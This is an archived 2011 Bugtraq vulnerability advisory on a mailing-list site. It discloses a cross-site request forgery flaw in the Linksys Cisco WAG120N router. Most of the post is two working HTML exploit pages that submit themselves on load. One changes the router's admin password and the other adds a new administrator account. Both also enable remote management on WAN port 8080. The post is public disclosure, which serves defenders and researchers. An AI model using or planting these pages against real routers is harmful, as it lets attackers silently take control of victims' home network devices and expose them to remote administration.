| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 25 Feb 2011 09:19:12 -0700 From: irancrash@...il.com To: bugtraq@...urityfocus.com Subject: Linksys Cisco Wag120N CSRF Vulnerability ---------------------------------------------------------------- Hardware : Linksys Cisco Wag120n(And perhaps similar versions) Type of vunlnerability : CSRF ( Change Admin Password And Add User ) Risk of use : High ---------------------------------------------------------------- Producer Website : http://linksysbycisco.com ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Team Website : Http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- CSRF For Change Admin Password : #Use sysPasswd and sysConfirmPasswd to set new password <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="1"> <input type="hidden" name="h_user_list" value="1"> <input type="hidden" name="sysname" value="admin"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="no"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html> ---------------------------------------------------------------- CSRF For Add Administrator User: #Use sysPasswd and sysConfirmPasswd to set new password #if you add new user you should set pass_is_none=yes <html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://192.168.1.1/setup.cgi"; method="POST" name="form"> <input type="hidden" name="user_list" value="2"> <input type="hidden" name="h_user_list" value="2"> <input type="hidden" name="sysname" value="ircrash"> <input type="hidden" name="sysPasswd" value="password"> <input type="hidden" name="sysConfirmPasswd" value="password"> <input type="hidden" name="remote_management" value="enable"> <input type="hidden" name="http_wanport" value="8080"> <input type="hidden" name="upnp_enable" value="enable"> <input type="hidden" name="wlan_enable" value="enable"> <input type="hidden" name="igmp_proxy_enable" value="enable"> <input type="hidden" name="save" value="Save+Settings"> <input type="hidden" name="h_pwset" value="yes"> <input type="hidden" name="sysname_changed" value="yes"> <input type="hidden" name="pwchanged" value="yes"> <input type="hidden" name="pass_is_default" value="false"> <input type="hidden" name="h_remote_management" value="enable"> <input type="hidden" name="pass_is_none" value="yes"> <input type="hidden" name="h_upnp_enable" value="enable"> <input type="hidden" name="h_wlan_enable" value="enable"> <input type="hidden" name="h_igmp_proxy_enable" value="enable"> <input type="hidden" name="todo" value="save"> <input type="hidden" name="this_file" value="Administration.htm"> <input type="hidden" name="next_file" value="Administration.htm"> <input type="hidden" name="message" value=""> <input type="hidden" name="h_wps_cur_status" value=""> </form> </body> </html> ----------------------------------------------------------------
Powered by blists - more mailing lists